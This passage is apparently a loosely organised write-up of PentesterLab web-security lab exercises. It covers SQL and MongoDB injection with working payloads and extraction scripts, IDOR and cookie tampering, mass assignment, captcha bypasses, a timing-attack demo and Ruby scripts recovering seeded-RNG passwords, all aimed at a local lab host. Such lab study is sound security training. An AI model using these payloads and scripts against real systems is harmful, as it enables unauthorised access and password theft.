Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1: SELECT * FROM users WHERE username='1'' AND password='1'
username=' or '1'='1&password=1' or 1=1 limit 1%23&submit=提交查询
Example 3
Single quotes are filtered here; let's look at the code.
```ruby
# Example 3 server-side code: single quotes are stripped, but nothing else is
params['username'].gsub!("'", "")
params['password'].gsub!("'", "")
sql  = "SELECT * FROM users WHERE username='" + params['username'] + "'"
sql += " AND password='" + params['password'] + "'"
```
Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1: SELECT * FROM users WHERE id=1'
```ruby
# id is interpolated as a bare number; the name it returns is then interpolated
# into a second query (second-order injection)
sql = "SELECT * FROM users WHERE id=#{params[:id]}"
@r = ActiveRecord::Base.connection.execute(sql).to_a
if @r.size == 1
  name = @r.first[1]
  sql = "SELECT * FROM users WHERE username='#{name}'"
  @res = ActiveRecord::Base.connection.execute(sql).to_a
else
  raise Exception, "Should only return one user..."
end
```
There is probably no way to inject with a union here. I got stuck on this at the time and kept trying to work out how to get a union through; only after reading the docs did I realise my thinking was too narrow: the page echoes the database error, so error-based injection works.
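As an added example (not code from this writeup or from PentesterLab), the helper below builds the standard MySQL `EXTRACTVALUE()` error-based payload for the unquoted `id` parameter shown above and pulls the leaked value back out of the echoed `Mysql2::Error`. It assumes MySQL 5.1 or later and that the raw error reaches the page, as it does here. Because the XPath error message shows at most 32 characters, the value is read in 31-character `SUBSTRING()` slices. `fake_server` and `DEMO_VALUE` are constructed stand-ins so the script runs offline; against the exercise you would replace `fake_server` with a function that sends the payload as `id` and returns the response body.

```python
import re
from typing import Callable, Optional

# Added example, not code from the writeup or from PentesterLab. When the raw
# Mysql2::Error is echoed, EXTRACTVALUE() with an invalid XPath expression makes
# MySQL print the expression back, so anything CONCAT()ed after a marker byte
# leaks through the error text. Assumes MySQL 5.1+ and the unquoted
# "WHERE id=#{params[:id]}" interpolation shown above.
MARKER = 0x7E        # '~', written as a hex literal so no quote character is needed
CHUNK = 31           # the XPath error shows at most 32 characters, one is the marker


def build_payload(subquery: str, offset: int = 0) -> str:
    """Value for the id parameter. id is interpolated as a bare number, so no
    quote is needed to break out; the subquery is sliced with SUBSTRING() so
    values longer than 31 characters can be read over several requests."""
    expr = f"SUBSTRING(({subquery}),{offset + 1},{CHUNK})"
    return f"1 AND EXTRACTVALUE(1,CONCAT(0x{MARKER:02x},{expr}))"


def parse_leak(error_text: str) -> Optional[str]:
    """Pull the leaked slice out of the echoed error; None if the page did not
    return the XPath error at all (for example because the payload was filtered)."""
    m = re.search(r"XPATH syntax error: '~([^']*)'", error_text)
    return m.group(1) if m else None


def extract(send: Callable[[str], str], subquery: str) -> str:
    """Keep requesting the next slice until the server returns a short (final) one."""
    value = ""
    while True:
        chunk = parse_leak(send(build_payload(subquery, len(value))))
        if not chunk:
            return value
        value += chunk
        if len(chunk) < CHUNK:
            return value


# Constructed stand-in for the vulnerable page so the example runs offline: it
# "evaluates" the SUBSTRING() and echoes the error the way the exercise does.
DEMO_VALUE = "admin:constructed_hash_value_for_this_demo_only"


def fake_server(payload: str) -> str:
    m = re.search(r"SUBSTRING\(\(.*\),(\d+),(\d+)\)", payload)
    start, length = int(m.group(1)) - 1, int(m.group(2))
    leaked = DEMO_VALUE[start:start + length]
    return (f"Mysql2::Error: XPATH syntax error: '~{leaked}': "
            f"SELECT * FROM users WHERE id={payload}")


if __name__ == "__main__":
    print(extract(fake_server, "SELECT CONCAT(username,0x3a,password) FROM users LIMIT 1"))
```

The payload keeps the first query returning exactly one row (`1 AND ...`), so the `@r.size == 1` check in the code above still passes; the leak happens in the error raised while evaluating the `AND` condition, not in the second query.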
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you have logged in and had a play around, log out and try to access the same information.
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you have logged in and had a play around, try to access the information from user2.
This one is a horizontal privilege escalation and fairly simple as well: capture the request and step through the infos IDs in order, and user2's record shows up.
```http
GET /authorization/example2/infos/3 HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/authorization/example2/
Connection: close
Cookie: rack.session=8c8b4862b1564eb97e9c4873e34c60d89409086ae1ecb229303e6715f3e1b69d
Upgrade-Insecure-Requests: 1
```
Example 3
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you have logged in and had a play around, try to access the information from user2.
```python
import requests
import string

# Blind MongoDB (JavaScript) injection: the regex only matches while the
# prefix guessed so far is correct, so 'admin' appears in the page exactly
# when one more character has been recovered. %26%26 is a URL-encoded &&.
index_url = 'http://172.16.71.149/mongodb/example2/?search='
passwd = ''
while True:
    for i in string.ascii_letters + string.digits:
        payload = "admin' %26%26 this.password.match(/^" + passwd + i + "/)//"
        rep = requests.get(index_url + payload)
        # print(rep.text)
        if 'admin' in rep.text:
            passwd += i
            print("[-] find a char:{}".format(passwd))
            break
    else:
        # no candidate extended the prefix: the whole password has been recovered
        break
print("[+] password: {}".format(passwd))
```
Authentication
Example 1
Weak credentials: admin/admin.
Example 2
I assumed this was some kind of social engineering, but the docs say the password is brute-forced by exploiting the difference in how long the password comparison takes.
```http
GET /authentication/example2/ HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/
Connection: close
Cookie: rack.session=0dbcdabae0f95432d8fa96ebf7103952ba2f82590bc454db88cb00b400b1d3fb
Upgrade-Insecure-Requests: 1
Authorization: Basic aGFja2VyOmhhY2tlcg==
```
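To make the timing attack the docs describe concrete, here is an added example (not code from this writeup or from PentesterLab) that reproduces the idea locally: a password check that stops at the first wrong character takes longer the more leading characters are right, so each position can be recovered by picking the candidate with the slowest response. `SECRET`, `STEP_DELAY` and `make_login` are constructed stand-ins for the server behind `/authentication/example2/`; the per-character delay is deliberately exaggerated so the demo is stable, and the password length is assumed known. Against the real exercise the same `recover_password` loop would time HTTP Basic requests instead, with many more samples per candidate.

```python
import hmac
import string
import time
from typing import Callable

# Added example, not code from the writeup or from PentesterLab. Everything here
# is a constructed local stand-in for the example 2 server; no HTTP is involved.
SECRET = "kcqs"          # constructed; not the exercise's real password
STEP_DELAY = 0.002       # exaggerated per-character cost so the demo is stable
                         # (a real leak is microseconds and needs many samples)


def insecure_equals(guess: str, secret: str) -> bool:
    """Character-by-character comparison that stops at the first mismatch,
    so the time taken reveals how many leading characters were right."""
    if len(guess) != len(secret):
        return False
    for g, s in zip(guess, secret):
        time.sleep(STEP_DELAY)   # stands in for the per-character work
        if g != s:
            return False
    return True


def constant_time_equals(guess: str, secret: str) -> bool:
    """The fix: hmac.compare_digest takes the same time whatever the position
    of the first differing character."""
    return hmac.compare_digest(guess.encode(), secret.encode())


def make_login(compare: Callable[[str, str], bool], secret: str = SECRET) -> Callable[[str], bool]:
    """Constructed login endpoint: the attacker only sees True/False and how
    long the call took."""
    return lambda guess: compare(guess, secret)


def cost(login: Callable[[str], bool], guess: str, samples: int = 5) -> float:
    """Fastest of several attempts; jitter only ever adds time, so the minimum
    is the most reliable estimate of the server's own work."""
    best = float("inf")
    for _ in range(samples):
        t0 = time.perf_counter()
        login(guess)
        best = min(best, time.perf_counter() - t0)
    return best


def recover_password(login: Callable[[str], bool], length: int,
                     alphabet: str = string.ascii_lowercase) -> str:
    """Per position, the candidate that makes the check run longest matched one
    more character. The last position needs no timing: the login either
    succeeds or it does not. Assumes the password length is known."""
    known = ""
    for pos in range(length):
        pad = alphabet[0] * (length - pos - 1)
        timings = {}
        for c in alphabet:
            guess = known + c + pad
            if login(guess):
                return guess
            timings[c] = cost(login, guess)
        known += max(timings, key=timings.get)
    return known


if __name__ == "__main__":
    print(recover_password(make_login(insecure_equals), len(SECRET)))
```

Swapping `insecure_equals` for `constant_time_equals` in `make_login` removes the signal: every wrong guess costs the same, so the per-position maximum becomes noise and the loop no longer converges on the secret.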
```http
GET /authentication/example3/ HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=admin
Upgrade-Insecure-Requests: 1
```
```http
GET /authentication/example4/ HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/authentication/example4/?username=user1&password=admin&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
Connection: close
Cookie: user=24c9e15e52afc47c225b757e7bee1f9d;
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```
A "Modify your profile" feature has been added, so it is just a matter of sending user[admin]=1 to that API.
Example 3
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you have logged in, try to access the information from the company “Company 2”.
Much the same as before, except that this time you add user[company_id]=2 to the edit request.
Captcha
I get the feeling this series never intended you to actually squint at the captcha...
Example 1
Just remove the captcha request parameter.
```http
GET /captcha/example1/submit?submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/captcha/example1/
Connection: close
Cookie: rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54d
Upgrade-Insecure-Requests: 1
```
Example 2
The answer can be seen in the request headers.
```http
GET /captcha/example2/submit?captcha=1&answer=EDtRmsPHWz&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/captcha/example2/
Connection: close
Cookie: rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54d
Upgrade-Insecure-Requests: 1
```
Example 3
It can be seen in the cookie.
```http
GET /captcha/example3/submit?captcha=1&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: 172.16.71.149
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.71.149/captcha/example3/
Connection: close
Cookie: captcha=C%5DjhO%5DEL%5B%5B; rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54d
Upgrade-Insecure-Requests: 1
```
In this exercise, you can log in with the following user: “hacker” with the password “hjtvse”. Your user is the second one that has been created for this application and you retrieved the following source code:
In this exercise, you can log in with the following user: “hacker” with the password “afxabo”. Your user is the second one that has been created for this application and you retrieved the following source code:
```ruby
# The generator is seeded with the current Unix timestamp and the admin password
# is drawn before the hacker password, so walking the timestamp backwards until
# the hacker password matches the known one reproduces the admin password too.
timestamp = (Time.now.to_f).to_i
seed = Random.new(timestamp)
pass_admin  = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
pass_hacker = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
while pass_hacker != "afxabo" do
  timestamp = timestamp - 1
  seed = Random.new(timestamp)
  pass_admin  = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
  pass_hacker = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
end
puts "Password of admin: "
puts pass_admin # vqcpux
```
That gives the admin password.
Example 3
In this exercise, you can log in with the following user: “hacker” with the password “xgyymbghxo”. Your user is the second one that has been created for this application and you retrieved the following source code:
In this exercise, you can log in with the following user: “hacker” with the password “wtpwnl”. Your user is the second one that has been created for this application and you retrieved the following source code:
```ruby
# Here the seed is fixed at 0; the unknown is how many rand(5) calls were
# consumed before the passwords were generated. Count n down from 1000 until
# the hacker password matches, then the admin password drawn just before it
# is known as well.
n = 1000
seed = Random.new(0)
n.times { seed.rand(5) }
pass_admin  = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
pass_hacker = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
while pass_hacker != "wtpwnl" do
  n = n - 1
  seed = Random.new(0)
  n.times { seed.rand(5) }
  pass_admin  = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
  pass_hacker = 6.times.map { ('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)] }.join
end
puts "Password of admin: "
puts pass_admin
```